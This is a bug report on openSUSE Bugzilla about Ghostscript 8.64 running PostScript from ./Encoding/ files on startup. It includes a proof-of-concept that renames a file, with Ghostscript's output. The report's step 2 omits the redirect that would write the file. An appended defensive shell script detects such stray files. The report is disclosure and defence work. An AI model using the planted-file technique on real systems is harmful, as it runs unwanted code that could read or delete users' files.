Encoding/pwnd
http://bugzilla.novell.com/show_bug.cgi?id=608071
http://bugzilla.novell.com/show_bug.cgi?id=608071#c0

           Summary: Ghostscript executes random code on startup
    Classification: openSUSE
           Product: openSUSE 11.2
           Version: Final
          Platform: x86-64
        OS/Version: openSUSE 11.2
            Status: NEW
          Severity: Critical
          Priority: P5 - None
         Component: Printing
        AssignedTo: jsmeix@novell.com
        ReportedBy: giecrilj@stegny.2a.pl
         QAContact: jsmeix@novell.com
          Found By: ---
           Blocker: ---

User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.1.9) Gecko/20100317 SUSE/3.5.9-0.1.1 Firefox/3.5.9

The following script changes the name of file ./test.ps in the current directory to ./pwnd.ps. The attack is performed by a hidden Ghostscript configuration file that should not be treated as a configuration file at all. Steps 1 and 2 are needed only once; indeed, if you have ./Encoding/* for any reason, Ghostscript will execute code from there, and the results will range from annoying to pernicious. The example attack renames a single file; real haxorz are invited to read files or delete them.

The script creates ./Encoding for demonstration purposes; if you happen to have any file in ./Encoding/ or $GS_LIB/Encoding, you are PWND each time you run gs.

Reproducible: Always

Steps to Reproduce:
1. mkdir Encoding
2. echo '(PWND BY ARTIFEX HAXORZ\n) print (test.ps) (pwnd.ps) renamefile quit'
3. gs

Actual Results:
GPL Ghostscript 8.64 (2009-02-03)
Copyright (C) 2009 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file COPYING for details.
PWND BY ARTIFEX HAXORZ
While reading gs_fntem.ps:
Error: /undefined in --quit--
Operand stack:
   (gs_fntem.ps)   1   FontEmulationProcs   encodingnames   --nostringval--   --nostringval--   StandardEncoding   --nostringval--   ISOLatin1Encoding   --nostringval--   SymbolEncoding   --nostringval--   DingbatsEncoding   --nostringval--   DingbatsEncoding   --nostringval--   StandardEncoding   --nostringval--   ISOLatin1Encoding   --nostringval--   SymbolEncoding   --nostringval--   Wingdings   pwnd   pwnd   Encoding
Execution stack:
   %interp_exit   --nostringval--   --nostringval--   --nostringval--   %array_continue   --nostringval--   --nostringval--   --nostringval--   false   1   %stopped_push   --nostringval--   1831   17   5   %oparray_pop   --nostringval--   --nostringval--   --dict:17/21(ro)(G)--   --dict:2/2(G)--   --nostringval--   1   %dict_continue   --nostringval--   --nostringval--   1829   26   5   %oparray_pop   findresource   %errorexec_pop   --nostringval--   --nostringval--   --nostringval--   --nostringval--   1220188   pwnd   27   --nostringval--   --nostringval--   false   1   %stopped_push   1755   27   6   %oparray_pop   --nostringval--   %errorexec_pop   .runexec2   --nostringval--   --nostringval--   --nostringval--   2   %stopped_push   --nostringval--   1820   26   6   %oparray_pop   1754   26   6   %oparray_pop   .runexec2   --nostringval--   --nostringval--   --nostringval--   2   %stopped_push   --nostringval--
Dictionary stack:
   --dict:963/3371(G)--   --dict:0/20(G)--   --dict:63/200(L)--   --dict:963/3371(G)--   --dict:10/10(G)--   --dict:17/21(ro)(G)--
Current allocation mode is global

The file test.ps is renamed to pwnd.ps

Expected Results:
Ghostscript should not read ./Encoding/* on startup and start normally. It should not rename any files (unless asked to do it by the user's script).

Here is what Artifex has to say:

    We really do not care about the reporter's opinion or curiosity. A simple "Thank you" is sufficient. Any further comment on this bug report will result in the reporter's account being banned. You have been warned.
<URL:http://bugs.ghostscript.com/show_bug.cgi?id=691316>
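A defender-side check added here (not part of the bug report and not Ghostscript's own code): it walks the directories Ghostscript 8.x searches for library files by default, the current directory and every entry of $GS_LIB, and flags any Encoding/ subdirectory that holds regular files, which is exactly the condition the reporter says gets you "PWND each time you run gs". The function names are assumptions of this example.

```shell
#!/bin/sh
# Added example, not from the report: find stray Encoding/ files that
# Ghostscript 8.64 would execute as PostScript on startup.

# Print the library directories gs searches by default, one per line:
# the start directory (default: the current one) followed by each
# colon-separated entry of $GS_LIB. Empty entries are skipped.
gs_lib_dirs() {
    printf '%s\n' "${1:-.}"
    printf '%s\n' "${GS_LIB:-}" | tr ':' '\n' | sed '/^$/d'
}

# Print every regular file found under <libdir>/Encoding for each
# searched directory. Prints nothing when the tree is clean.
stray_encoding_files() {
    gs_lib_dirs "${1:-.}" | while IFS= read -r dir; do
        for f in "$dir"/Encoding/*; do
            # An unmatched glob leaves the literal pattern, which -f rejects.
            if [ -f "$f" ]; then
                printf '%s\n' "$f"
            fi
        done
    done
}

# Return 0 when no stray Encoding files exist, 1 (with a report on
# stderr) when gs run from this directory would execute something.
# Usage: check_stray_encoding [start-directory]
check_stray_encoding() {
    files=$(stray_encoding_files "${1:-.}")
    if [ -z "$files" ]; then
        return 0
    fi
    printf 'Encoding file(s) gs would execute on startup:\n%s\n' "$files" >&2
    return 1
}

# Typical wrapper use: refuse to start gs in a directory that fails the
# check, or pass gs its documented -P- option so it does not search the
# current directory first for library files.
#   check_stray_encoding "$PWD" || exit 1
#   gs -P- "$@"
```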